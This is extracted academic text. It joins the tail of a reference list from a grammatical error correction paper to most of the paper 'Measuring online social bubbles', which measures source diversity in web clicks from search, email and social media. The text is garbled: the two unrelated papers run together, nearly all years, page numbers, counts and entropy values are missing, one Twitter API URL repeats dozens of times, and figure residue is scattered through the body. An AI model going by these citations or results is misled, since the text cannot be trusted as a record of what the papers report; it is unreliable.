martin chodorow, markus dickinson, ross israel, and joel tetreault. .
problems in evaluating gram- matical error detection systems. in proceedings of coling , pages – , mumbai, india, de- cember. the coling organizing committee. daniel dahlmeier and hwee tou ng. . better evaluation for grammatical error correction. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – , montréal, canada, june. association for compu- tational linguistics. daniel dahlmeier, hwee tou ng, and siew mei wu. . building a large annotated corpus of learner en- glish: the nus corpus of learner english. in pro- ceedings of the eighth workshop on innovative use of nlp for building educational applications, pages – , atlanta, georgia, june. association for com- putational linguistics. robert dale and adam kilgarriff. . helping our own: the hoo pilot shared task. in proceedings of the generation challenges session at the th eu- ropean workshop on natural language generation, pages – , nancy, france, september. associa- tion for computational linguistics. robert dale, ilya anisimoff, and george narroway. . hoo : a report on the preposition and determiner error correction shared task. in proceed- ings of the seventh workshop on building educational applications using nlp, pages – , montréal, canada, june. association for computational linguis- tics. mariano felice and ted briscoe. . towards a stan- dard evaluation method for grammatical error detec- tion and correction. in proceedings of the con- ference of the north american chapter of the associa- tion for computational linguistics, denver, co, june. association for computational linguistics. roman grundkiewicz, marcin junczys-dowmunt, and edward gillian. . human evaluation of gram- matical error correction systems. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portu- gal, september. association for computational lin- guistics. ralf herbrich, tom minka, and thore graepel. . trueskilltm: a bayesian skill rating system. in proceedings of the twentieth annual conference on neural information processing systems, pages – , vancouver, british columbia, canada, decem- ber. mit press. philipp koehn. . simulating human judgment in machine translation evaluation campaigns. proceed- ings iwslt . c. leacock, m. chodorow, m. gamon, and j. tetreault. . automated grammatical error detection for language learners, second edition. synthesis lec- tures on human language technologies. morgan & claypool publishers. nitin madnani, martin chodorow, joel tetreault, and alla rozovskaya. . they can help: using crowd- sourcing to improve the evaluation of grammatical er- ror detection systems. in proceedings of the th an- nual meeting of the association for computational linguistics: human language technologies, pages – , portland, oregon, usa, june. association for computational linguistics. andrew mutton, mark dras, stephen wan, and robert dale. . gleu: automatic evaluation of sentence- level fluency. in proceedings of the th annual meet- ing of the association of computational linguistics, pages – , prague, czech republic, june. asso- ciation for computational linguistics. courtney napoles, keisuke sakaguchi, matt post, and joel tetreault. . ground truth for grammatical error correction metrics. 
in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : short pa- pers), pages – , beijing, china, july. associa- tion for computational linguistics. hwee tou ng, siew mei wu, yuanbin wu, christian hadiwinoto, and joel tetreault. . the conll- shared task on grammatical error correction. in proceedings of the seventeenth conference on com- putational natural language learning: shared task, pages – , sofia, bulgaria, august. association for computational linguistics. hwee tou ng, siew mei wu, ted briscoe, christian hadiwinoto, raymond hendy susanto, and christo- pher bryant. . the conll- shared task on grammatical error correction. in proceedings of the eighteenth conference on computational natural language learning: shared task, pages – , balti- more, maryland, june. association for computational linguistics. diane nicholls. . the cambridge learner corpus: error coding and analysis for lexicography and elt. in proceedings of the corpus linguistics confer- ence, pages – . kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic eval- uation of machine translation. in proceedings of th annual meeting of the association for computational linguistics, pages – , philadelphia, pennsylva- nia, usa, july. association for computational lin- guistics. ellie pavlick, rui yan, and chris callison-burch. . crowdsourcing for grammatical error correction. in proceedings of the companion publication of the th acm conference on computer supported cooperative work & social computing, pages – . acm. alla rozovskaya and dan roth. . annotating esl errors: challenges and rewards. in proceedings of the naacl hlt fifth workshop on innovative use of nlp for building educational applications, pages – , los angeles, california, june. association for computational linguistics. alla rozovskaya and dan roth. . building a state- of-the-art grammatical error correction system. trans- actions of the association for computational linguis- tics, : – . keisuke sakaguchi, matt post, and benjamin van durme. . efficient elicitation of anno- tations for human evaluation of machine translation. in proceedings of the ninth workshop on statisti- cal machine translation, pages – , baltimore, maryland, usa, june. association for computational linguistics. matthew snover, bonnie dorr, richard schwartz, lin- nea micciulla, and john makhoul. . a study of translation edit rate with targeted human annotation. in proceedings of association for machine translation in the americas, pages – . ben swanson and elif yamangil. . correction de- tection and error type selection as an esl educational aid. in proceedings of the conference of the north american chapter of the association for com- putational linguistics: human language technolo- gies, pages – , montréal, canada, june. asso- ciation for computational linguistics. joel tetreault and martin chodorow. . native judg- ments of non-native usage: experiments in preposi- tion error detection. in coling : proceedings of the workshop on human judgements in computational linguistics, pages – , manchester, uk, august. coling organizing committee. joel tetreault, elena filatova, and martin chodorow. . rethinking grammatical error annotation and evaluation with the amazon mechanical turk. in proceedings of the naacl hlt fifth workshop on innovative use of nlp for building educational applications, pages – , los angeles, california, june. 
association for computational linguistics. joel tetreault, martin chodorow, and nitin madnani. . bucking the trend: improved evaluation and annotation practices for esl error detection systems. language resources and evaluation, ( ): – . huichao xue and rebecca hwa. . improved correc- tion detection in revised esl sentences. in proceed- ings of the nd annual meeting of the association for computational linguistics (volume : short papers), pages – , baltimore, maryland, june. associa- tion for computational linguistics. helen yannakoudakis, ted briscoe, and ben medlock. . a new dataset and method for automatically grading esol texts. in proceedings of the th an- nual meeting of the association for computational linguistics: human language technologies, pages – , portland, oregon, usa, june. association for computational linguistics. measuring online social bubbles submitted august accepted november published december corresponding author dimitar nikolov, dnikolov@indiana.edu academic editor mark wilson additional information and declarations can be found on page doi . /peerj-cs. copyright nikolov et al. distributed under creative commons cc-by . open access measuring online social bubbles dimitar nikolov, diego f.m. oliveira, alessandro flammini and filippo menczer center for complex networks and systems research, indiana university, bloomington, in, united states abstract social media have become a prevalent channel to access information, spread ideas, and influence opinions. however, it has been suggested that social and algorithmic filtering may cause exposure to less diverse points of view. here we quantitatively measure this kind of social bias at the collective level by mining a massive datasets of web clicks. our analysis shows that collectively, people access information from a significantly narrower spectrum of sources through social media and email, compared to a search baseline. the significance of this finding for individual exposure is revealed by investigating the relationship between the diversity of information sources experienced by users at both the collective and individual levels in two datasets where individual users can be analyzed—twitter posts and search logs. there is a strong correlation between collective and individual diversity, supporting the notion that when we use social media we find ourselves inside “social bubbles.” our results could lead to a deeper understanding of how technology biases our exposure to new information. subjects network science and online social networks, social computing, world wide web and web science keywords bias, diversity, polarization, filter bubble, echo chamber, web traffic introduction the rapid adoption of the web as a source of knowledge and a social space has made it ever more difficult for people to manage the constant stream of news and information arriving on their screens. content providers and users have responded to this problem by adopting a wide range of tools and behaviors that filter and/or rank items in the information stream. one important result of this process has been higher personalization (mobasher, cooley & srivastava, )—people see more content tailored specifically to them based on their past behaviors or social networks. recommendation systems (ricci et al., ), for example, suggest items in which one is more likely to be interested based on previous purchases, past actions of similar users, or other criteria based on one’s past behavior and friends. 
search engines provide personalized results as well, based on browsing histories and social connections (google, b; google, a). it is common for users themselves to adopt filters in their online behavior, whether they do this consciously or not. for example, on social platforms such as facebook, a large portion of users are exposed to news shared by their friends (bakshy et al., ; matsa & mitchell, ). because of the limited time and attention people possess and the large popularity of online social networks, the discovery of information is being transformed from an individual to a social endeavor. while the tendency to selectively expose ourselves to the opinion of like-minded people was present in the pre-digital world (hart et al., ; kastenmüller et al., ), the ease with which we can find, follow, and focus on such people and exclude others in the online world may enhance this tendency. regardless of whether biases in information exposure are stronger today versus in the pre-digital era, the traces of online behavior provide a valuable opportunity to quantify such biases.

while useful, personalization filters (whether they are algorithmic, social, a combination of both, and whether they are used with or without user awareness) have biases that affect our access to information in important ways. in one line of reasoning, sunstein ( ), sunstein ( ) and pariser ( ) have argued that the reliance on personalization and social media can lead people to being exposed to a narrow set of viewpoints. according to this hypothesis, one's existing beliefs are reinforced because they are locked inside so-called "filter bubbles" or "echo chambers," which prevent one from engaging with ideas different from their own. such selective exposure could facilitate confirmation bias (baron, ; nickerson, ) and possibly create a fertile ground for polarization and misinformed opinions (nyhan & reifler, ; mckenzie, ; stanovich, west & toplak, ; silverman, ).

these concerns are borne out to varying degrees in online user behavior data. for example, on facebook, three filters (the social network, the feed population algorithm, and a user's own content selection) combine to decrease exposure to ideologically challenging news from a random baseline by more than % for conservative users, and close to % for liberal users (bakshy, messing & adamic, ). the same study however highlights the difficulty in interpreting measurements of diverse information exposure. the decrease in exposure is significant, but the random baseline represents a completely bias-free exposure, which may not occur in reality. our exposure is biased both in our explicit choices of information sources and implicitly through homophily, our tendency to associate with like-minded friends. each social media filter may mitigate or amplify these biases. the combination of filters on facebook still allows for exposure to some ideologically challenging news. but how does this compare to other ways of discovering information?
in a different facebook study, users, especially partisan ones, were more likely to share articles with which they agree (an et al., ). similar patterns can be seen on other platforms. on blogs, commenters are several times more likely to agree with each other than not (gilbert, bergstrom & karahalios, ), and liberals and conservatives primarily link within their own communities (adamic & glance, ). on twitter, political polarization is even more evident (conover et al., ; conover et al., ). when browsing news, people are more likely to be exposed to like-minded opinion pieces (flaxman, goel & rao, ), and to stay connected and share articles with others having similar interests and values (grevet, terveen & gilbert, ). in the context of controversial events that are highly polarizing, web sources tend to be partial and unbalanced, and only a small fraction of online readers visit more than two different sources (koutra, bennett & horvitz, ). to respond to such narrowing of online horizons, researchers have started to concentrate on more engaging presentation of disagreeable content (doris-down, versee & gilbert, ; munson & resnick, ; graells-garrido, lalmas & quercia, ).

in domains outside of political discourse there is less evidence that personalization and social networks lead to filter bubbles. recommendation systems have a diversifying effect on purchases (hosanagar et al., ), and search engines have had a democratizing effect on the discovery of information, despite the popularity-based signals used in their ranking algorithms (fortunato et al., ). aspects of the filter bubble hypothesis have so far been quantified for specific platforms like blogs (adamic & glance, ), facebook (bakshy, messing & adamic, ), and twitter (conover et al., ), but not across different classes of information sources. indeed, social media and blogs could be very different from other types of sites, because of the strong social influence in them. what these differences may be and how they affect information consumption is an open question. for example, on the one hand, one would imagine homophily to contribute to the formation of echo chambers in social networks. on the other hand, the abundance of weak ties between individuals in different communities (bakshy et al., ) could lead to highly diverse exposure.

in this study we look at the diversity of information exposure more broadly. our goal is to examine biases inherent in different types of online activity: information search, one-to-one communication from email exchanges, and many-to-many communication captured from social media streams. how large is the diversity of information sources to which we are exposed through interpersonal communication channels, such as social media and email, compared to a baseline of information seeking? we answer this question at the collective level by analyzing a massive dataset of web clicks. in addition, we investigate how this analysis relates to the diversity of information accessed by individual users through an analysis of two additional datasets: twitter posts and search logs. figure illustrates our empirical analysis: we measure how the visits by people that are engaged in different types of online activities are distributed across a broad set of websites (figs. a and c) or concentrated within a few (figs. b and d).
we carry out our analyses on all web targets as well as on targets restricted to news sites. the latter are of particular relevance when examining bias in public discourse. we do not make any additional distinctions regarding the type of content people visit, such as opinion pieces versus reporting, or differing ideological slant. we do not consider beliefs, past behaviors, or specific interests of information consumers. these deliberate choices are designed to yield quantitative measures of bias that do not depend on subjective assessments. our results are therefore general and applicable to different topics, geographical regions, interests, and media sources.

methods

to study the diversity of information exposure we use a massive collection of web clicks as our primary dataset, and two supplementary datasets of link shares on twitter and aol search clicks. code is available to reproduce our entire data processing procedure, described next (https://github.com/dimitargnikolov/web-traffic-iu).
[figure : diversity of information sources accessed through different online channels. each circle represents a unique website, and its area is proportional to the number of pages accessed on that website. (a) links clicked by a single search engine user. (b) links shared by a single twitter user. (c) search traffic generated by a collection of users. (d) social media traffic generated by a collection of users. in each case, a random sample of links was taken for a period of one week. these examples illustrate typical behaviors gleaned from our data. on the left we see more heterogeneous patterns with search traffic distributed more evenly among several sources (higher shannon entropy ha = . and hc = . ). the patterns on the right are more homogeneous, with fewer sources dominating most social traffic (lower entropy hb = . and hd = . ).]

click dataset

the click data we use comes from a publicly available dataset collected at the edge of the indiana university network (meiss et al., ), which allows us to obtain a trace of web requests (http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/). each request record has a target page, a referrer (source) page, and a timestamp. privacy concerns prevent any identifying information about individual users or clients from being collected, making it impossible to associate any request with any particular computer or person. we only use the traffic coming from self-identified browsers to filter out search engine crawlers and other bots. the data only includes traffic originating inside the indiana university network and requesting external pages. this collection draws from a diverse population of over thousand people, and spans a period of months between october and may .

since in the click data it is not possible to distinguish with full certainty requests resulting from human clicks and requests auto-generated by the pages, we filter out any requests for files other than web pages, such as javascript, images, video, and so on, based on the file extension. this results in the shrinking of the dataset by a factor of . since the file extension is not always present in the url, this method is not guaranteed to remove all non-human click data. however, it provides a good first approximation of human clicks, and we further address this issue with additional data filtering described later in this section. once non-human traffic is removed from the dataset based on file extensions, the path in the url is discarded and the resulting clicks are only identified by the referrer and target domains.
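the extension-based filtering and the reduction of urls to domains described above can be sketched as follows; this is a minimal python illustration in which the extension list, the record format, and the helper names are assumptions, not the released processing pipeline.

```python
from urllib.parse import urlparse

# extensions treated as non-page requests (an illustrative, not exhaustive, list)
NON_PAGE_EXTENSIONS = {".js", ".css", ".png", ".jpg", ".jpeg", ".gif", ".ico",
                       ".mp4", ".flv", ".swf", ".xml", ".json"}


def is_page_request(url):
    """keep a request only if its path does not end in a known non-page extension."""
    path = urlparse(url).path.lower()
    return not any(path.endswith(ext) for ext in NON_PAGE_EXTENSIONS)


def to_domain(url):
    """reduce a url to its host name, which serves as a proxy for the website."""
    return urlparse(url).netloc.lower()


# assumed record format: (timestamp, referrer_url, target_url)
def filter_clicks(records):
    for ts, referrer, target in records:
        if is_page_request(target):
            yield ts, to_domain(referrer), to_domain(target)
```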
we take referrer and target domains as proxies for websites. this level of granularity allows us to address the research question while avoiding the problem of the sparseness of the traffic at the page level: users typically visit most pages once. even if we identify a domain with a website, not all sites are equal; wikipedia.org has more diverse content than kinseyinstitute.org. furthermore, one needs to decide whether to represent domains at the second or higher level. in many instances, higher-level domains reflect infrastructural or organizational differences that are not important to measure diversity (e.g., m.facebook.com vs. l.facebook.com). in other cases, using second-level domains may miss important content differences (e.g., sports.yahoo.com vs. finance.yahoo.com). to address this issue, we performed our analysis using both second- and third-level domains. as discussed below, these analyses yield very similar results. in the remainder of the paper we consider second-level domains, but account for special country cases; for example, domains such as theguardian.co.uk are considered as separate websites. once we have a definition of a website, we use the number of clicks in the data to compute a diversity measure as discussed below.

after extracting the domain at the end points of each click, we examined the most popular referrers in the dataset and manually assigned them to the search, social media, and email categories. we then filtered the click data to only include referrers from these categories. in addition, we excluded targets from these same categories, because we are specifically interested in the acquisition of new information. for example, activities such as refining searches on google and socializing on facebook are unlikely to represent such discovery. subsequent data filtering was performed to exclude other likely non-human traffic, such as traffic to ad and image servers, traffic resulting from game playing or using browser applications such as rss readers, and traffic to url shortening services. since it is impossible to exclude all non-human traffic, we focused on filtering out those target domains that constitute a significant portion of overall traffic. we used an iterative procedure in which we examined the top targets for each category and manually identified traffic that is non-human. this procedure was repeated until the list of top domains in each category was composed of legitimate targets.

[table : most frequent sources for each category of traffic and their corresponding numbers of clicks.
search: google.com ( , , ), search.yahoo.com ( , , ), search.msn.com ( , ), bing.com ( , ), ask.com ( , ), search.naver.com ( , )
social media: facebook ( , ), reddit.com ( , ), twitter.com ( , ), myspace.com ( , ), youtube.com ( , ), linkedin.com ( , )
email: mail.yahoo.com ( , ), mail.live.com ( , ), mail.google.com ( , ), webmail.aol.com ( , ), hotmail.msn.com ( , ), webmail.iu.edu ( , )]

table lists the top six referrers in each category. the filtered dataset includes over million records, roughly representing someone clicking on a link from a search engine, email client, or social media site, and going to one of almost . million targets outside these three categories.
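a compact sketch of the referrer categorization and target filtering described above might look like this in python; the category sets mirror table , while the record format and function names are assumptions for illustration.

```python
from collections import Counter

# top referrers per category, following the table above
CATEGORIES = {
    "search": {"google.com", "search.yahoo.com", "search.msn.com",
               "bing.com", "ask.com", "search.naver.com"},
    "social media": {"facebook.com", "reddit.com", "twitter.com",
                     "myspace.com", "youtube.com", "linkedin.com"},
    "email": {"mail.yahoo.com", "mail.live.com", "mail.google.com",
              "webmail.aol.com", "hotmail.msn.com", "webmail.iu.edu"},
}


def category_of(referrer_domain):
    for name, domains in CATEGORIES.items():
        if referrer_domain in domains:
            return name
    return None


def target_counts_by_category(clicks):
    """clicks: iterable of (referrer_domain, target_domain) pairs.
    returns, for each category, a counter over target domains, excluding
    targets that themselves belong to any of the three categories."""
    all_category_domains = set().union(*CATEGORIES.values())
    counts = {name: Counter() for name in CATEGORIES}
    for referrer, target in clicks:
        cat = category_of(referrer)
        if cat is not None and target not in all_category_domains:
            counts[cat][target] += 1
    return counts
```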
[table : seed dmoz categories for the crawler used to extract a list of close to , news sites.
www.dmoz.org/news/internet broadcasts/
www.dmoz.org/news/magazines and e-zines/
www.dmoz.org/news/newspapers/
www.dmoz.org/news/internet broadcasts/audio/
www.dmoz.org/arts/television/news/
www.dmoz.org/news/analysis and opinion/
www.dmoz.org/news/alternative/
www.dmoz.org/news/breaking news/
www.dmoz.org/news/current events/
www.dmoz.org/news/extended coverage/]

news targets in the click dataset

to measure diversity of information exposure in the context of news, we created a separate dataset consisting only of clicks to news targets. due to the specific research question we are investigating, we believe it is important to build this dataset in an open and comprehensive way, including less popular news outlets. to this end, we extracted the list of news websites by traversing the dmoz open directory (http://www.dmoz.org/) starting with the seed categories shown in table and crawling their subcategories recursively. following the crawl, the list of news targets was filtered as follows.

1. each url was transformed to a canonical form and only the domain name was kept.
2. domains falling in one of the predefined categories (search, social media and email) were removed. urls from popular blogging platforms, wiki platforms, and news aggregators were also removed (see table ).
3. an iterative filtering procedure was applied to remove targets of non-human traffic, such as from rss clients, advertising, and content servers.

the above procedure resulted in nearly , news sites. we used this list to filter the targets in the click collection, yielding the news dataset used in our analysis.

diversity measure and relationship to traffic

to quantify the diversity of an information source s we look at all targets reached from websites in category s and compute the shannon entropy

$$
h_s = -\sum_{t \in t(s)} p_t \log p_t ,
$$

where t(s) is the set of target websites reached from referrer sites in s, and pt is the fraction of clicks requesting pages in website t. entropy (shannon, ) is a measure of uncertainty over a set of possible outcomes. it is maximized when all outcomes are equally likely, and minimized when only a single outcome is likely (indicating full certainty). used over the set of domain probabilities as we have done above, the entropy gives the uncertainty in the websites that will be accessed given a category of referrers.
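the entropy measure defined above reduces to a short computation over the empirical click distribution; the following python sketch assumes the natural logarithm, since the base is not specified here.

```python
import math
from collections import Counter


def shannon_entropy(target_domains):
    """h_s = -sum_t p_t log p_t over the distribution of clicked target domains."""
    counts = Counter(target_domains)
    total = sum(counts.values())
    return -sum((c / total) * math.log(c / total) for c in counts.values())


# toy example: traffic concentrated on one site has lower entropy
print(shannon_entropy(["a.com"] * 8 + ["b.com", "c.com"]))    # low diversity
print(shannon_entropy(["a.com", "b.com", "c.com", "d.com"]))  # maximal for four sites
```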
by measuring diversity over a set of domains, our approach captures the intuition that visiting pages (for example, news articles) from different sites implies a more diverse exposure than visiting pages from the same site. the implications of this assumption are further debated in the 'discussion' section. we considered an alternative method of measuring diversity based on the gini coefficient (sen, ), and found the results discussed below to be robust with respect to the choice of diversity measure.

[table : blogging platforms, wiki platforms and news aggregators filtered out of the list of news sites.
blogging platforms: blogger.com, blogspot.com, hubpages.com, livejournal.com, tumblr.com, typepad.com, wordpress.com, wordpress.org, xanga.com
wiki platforms: wikipedia.org, wictionary.org, wikibooks.org, wikidata.org, wikimediafoundation.org, wikinews.org, wikiquote.org, wikisource.org, wikiversity.org, wikivoyage.org
news aggregators: news.aol.com, news.google.com, news.yahoo.com]

the traffic volume in our click dataset varies significantly over time and across the three categories, as shown in fig. a. a similar pattern emerges for the dataset of news targets (see inset). these vast volume differences make it necessary to understand the relationship between traffic volume and the diversity of an information source. to do so, we measure the diversity over samples of increasing numbers of clicks. from fig. b we see that the diversity measurements indeed depend on volume, especially for small numbers of clicks; as the volume increases, the diversity tends to plateau. however, the dependence of diversity on number of clicks is different for each category of traffic. therefore, instead of normalizing each category of traffic by a separate normalization curve, we account for the dependence by using the same number of clicks. this makes our approach easier to generalize to more categories and datasets, since it does not require the fitting of a separate curve to each case. we compute the diversity over traffic samples of the same size ( , clicks per month for all targets, and , clicks per month for news targets) for each category in our analysis.

auxiliary datasets

in the second part of our analysis we make use of two auxiliary datasets to disentangle the relationship between collective diversity (as seen in the targets accessed by a community of users) and individual diversity (as seen in the targets accessed by a single user). from both datasets, we are able to recover a referring website, a target website, and an associated user identifier.
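to control for the volume dependence just described, diversity can be compared over repeated equal-size samples of clicks; the sketch below continues the previous one (it reuses the shannon_entropy helper), and the sample size, iteration count, and toy data are illustrative rather than the values used in the paper.

```python
import random


def sampled_entropy(target_domains, sample_size, iterations=100, seed=0):
    """mean entropy over repeated fixed-size samples of clicks, so that
    categories with different traffic volumes can be compared directly."""
    rng = random.Random(seed)
    scores = []
    for _ in range(iterations):
        sample = rng.sample(target_domains, sample_size)
        scores.append(shannon_entropy(sample))
    return sum(scores) / len(scores)


# compare categories on equal footing (toy data; real sample sizes differ)
search_targets = ["news.example.org", "wiki.example.org", "blog.example.net"] * 400
social_targets = ["video.example.com"] * 1000 + ["news.example.org"] * 200
print(sampled_entropy(search_targets, sample_size=300))
print(sampled_entropy(social_targets, sample_size=300))
```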
billion public posts containing links shared by over million people on twitter during a period of months between april and april . this data was obtained from the twitter streaming api (https://dev.twitter.com/streaming/overview). we treat these records as proxies for clicks, assuming that users have visited the shared pages. results figure a presents our main finding: the diversity of targets reached from social media is significantly lower than those reached from search engine traffic, for all traffic as well as news targets (inset). this result holds for both second- and third-level domains, and is consistent with results obtained using an alternative measures of diversity. the observed differences in diversity did not change significantly over a period of three and a half years (see fig. b). this empirical evidence suggests that social media expose the community to a narrower range of information sources, compared to a baseline of information seeking activities. figure illustrates the top targets of traffic from search and social media on a typical week. the diversity of targets reached via email also seems to be higher than that of social media, however the difference is smaller and its statistical significance is weaker due to the larger noise in the data. the difference in entropy is larger and more significant for traffic from email sources to news targets. while we wish to ultimately understand the biases experienced by individuals, the diversity measurements based on anonymous traffic data do not distinguish between users, and therefore they reveal a collective social bubble, as illustrated in figs. c and d. it is nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview 
http://dx.doi.org/ . /peerj-cs. mail social media search . . . . . e n tr o p y news aaaaaa o ct d ec fe b a p r ju l s ep n ov ja n m ar m ay ju l s ep m ar ju n a u g o ct d ec fe b a p r mail social media search . . . . . . . . . news b figure diversity of sources accessed by different online activities. (a) overall entropy for different traffic categories over the full range of data (oct –may ). each box represents the range of data between the th and th percentiles. the top and bottom whiskers show the th and st percentiles, respectively. the horizontal line and the hollow point inside each box mark the median and mean entropy, respectively. the filled points are outliers. the uncertainty was computed over data points representing the clicks that occurred over one calendar month. (b) entropy as a function of time. we smooth the data by applying a running average over a three-month sliding window that moves in increments of one month. error bars are negligibly small and thus omitted. the insets plot the entropy for news traffic (same scale if not shown). at first sight unclear whether the collective bubble implies individual bubbles, or tells us anything at all about individual exposure. the number of clicks per user, or even the number of users could vary to produce different individual diversity patterns resulting in the same collective diversity. in theory, high collective diversity could be consistent with low individual diversity, and vice versa. therefore we must investigate the relationship between collective and individual diversity measurements. to this end, we analyze the two auxiliary datasets where user information is preserved (see ‘methods’). for both datasets, we measure the diversity for individual users, and collectively disregarding user labels. the strong correlation between collective diversity and average user diversity (fig. ) suggests that our results relate not only to a collective bubble, but also to individual social bubbles, as illustrated in figs. a and b. discussion we have presented evidence that the diversity of information reached through social media is significantly lower than through a search baseline. as the social media role in supporting information diffusion increases, there is also an increased danger of reinforcing our collective filter bubble. a similar picture emerges when we specifically look at news traffic—the diversity of social media communication is significantly lower than that of search and inter-personal communication. given the importance of news consumption to civic discourse, this finding is especially relevant to the filter bubble hypothesis. our results suggest that social bubbles exist at the individual level as well, although our evidence is based on the relationship between collective and individual diversity and therefore indirect. analysis of traffic data with (anonymized) user identifiers will be necessary to confirm this conclusively. in addition, these results apply to the population of nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure top websites that are targets of % of clicks for search (a) and social media (b). this illustration refers to a typical week, with entropy close to (within one standard deviation from) average. the area of each rectangle is proportional to the number of clicks to that target. 
while these websites reflect the sample of users from indiana university as well as the time when the data was collected, these contexts apply to both categories of traffic. therefore the higher concentration of social media traffic on a small number of targets is meaningful. users from indiana university during the time period when the data was collected—from late to mid . repeating these experiments on other populations would be beneficial to establish the generality of our findings. indeed, the social media and search landscapes have changed since and how that affects the diversity of information exposure for people is an interesting question for ongoing research. further research is also needed to tease out the influence of social versus algorithmic effects. both are present in systems like facebook—the algorithmic effect has to do with how a platform populates the feed for each user, which can be determined by a variety of individual and collective signals such as past social interactions and popularity. it seems nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure correlation between collective and average individual entropy. each point corresponds to an equal-size sample of links for each of a set of users sampled during a period of one day, to avoid volume bias in the entropy measurements. (a) users sampled from search engine logs and their clicks (pearson’s r = . ). we sampled clicks from each of users per day. (b) users sampled from twitter and their shared links (r = . ). we sampled links from each of , users per day. unlikely that the relationship between algorithmic and social effects can be extracted from traces of online behavior as done here, without conducting controlled user studies. these results also come with the caveat that in our analysis we do not try to quantify the diversity inside each domain. we are assuming that the diversity of content is higher across different domains than across the pages within a single domain. the problem of quantify- ing the diversity of the content inside a single domain is a significant research problem in its own right, and one that would greatly benefit this and similar lines of research. quantifying domain diversity will likely need to be tackled by looking at the content of individual pages as other measures, such as the number of sub-domains or the number of pages inside the domain, are more indicative of size and popularity, but not necessarily of diversity. finally, in our study all social media traffic and all search traffic is merged. further work is needed to tease out possible differences in diversity of information accessed through distinct search and social platforms. the social media platforms that exist today have important differences in functionality, and it will be worthwhile to investigate whether all these services under the umbrella of social media have similar properties when it comes to diverse information exposure. conclusion our findings provide the first large-scale empirical comparison between the diversity of information sources reached through different types of online activity. the traffic dataset gives us a unique opportunity to carry out this analysis. we are not aware of any other methods, based on publicly available data, for contrasting different information access patterns produced by the same set of users, in the same time period. 
while we have found quantitative support of online social bubbles, the question of whether our reliance on technology for information access is fostering polarization and misinformation remains open. even with ample anecdotal evidence (mervis, ), we have yet to fully comprehend how today's technology biases exposure to information.

acknowledgement

we are grateful to mark meiss for collecting the web traffic dataset used in this paper.

additional information and declarations

funding
this manuscript is based upon work supported in part by the james s. mcdonnell foundation and the national science foundation (award ccf- ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: james s. mcdonnell foundation. national science foundation: ccf- .

competing interests
filippo menczer is an academic editor for peerj computer science. the other authors declare there are no competing interests.

author contributions
• dimitar nikolov and diego f.m. oliveira conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper.
• alessandro flammini and filippo menczer conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper.

data availability
the following information was supplied regarding data availability: the click collection system dataset from the iu school of informatics and computing restricts the access and use of this dataset for research purposes only, and requires all interested parties to submit a formal request at http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/.

references
adamic l, glance n. . the political blogosphere and the us election: divided they blog. in: linkkdd' : proceedings of the rd international workshop on link discovery. – .
an j, quercia d, cha m, gummadi k, crowcroft j. . sharing political news: the balancing act of intimacy and socialization in selective exposure. epj data science :article doi . /epjds/s - - - .
bakshy e, messing s, adamic l. . exposure to ideologically diverse news and opinion on facebook. science.
bakshy e, rosenn i, marlow c, adamic l. . the role of social networks in information diffusion. in: proceedings of the st international conference on world wide web, www' . new york: acm, – .
baron j. . thinking and deciding. rd edition. new york: cambridge university press.
conover m, ratkiewicz j, francisco m, gonçalves b, flammini a, menczer f. . political polarization on twitter. in: proceedings of the th international aaai conference on weblogs and social media (icwsm).
conover md, gonçalves b, flammini a, menczer f. . partisan asymmetries in online political activity. epj data science :article doi . /epjds .
doris-down a, versee h, gilbert e. . political blend: an application designed to bring people together based on political differences. in: proceedings of the th international conference on communities and technologies. new york: acm, – .
flaxman s, goel s, rao jm. . ideological segregation and the effects of social media on news consumption. in: ssrn scholarly paper id . new york: social science research network.
fortunato s, flammini a, menczer f, vespignani a. . topical interests and the mitigation of search engine bias. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. .
gilbert e, bergstrom t, karahalios k. . blogs are echo chambers: blogs are echo chambers. in: proceedings of hicss. piscataway: ieee, – .
google. a. introducing google social search: i finally found my friend's new york blog! available at http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html (accessed january ).
google. b. personalized search for everyone. available at http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html (accessed august ).
graells-garrido e, lalmas m, quercia d. . data portraits: connecting people of opposing views. technical report. arxiv preprint. arxiv: . .
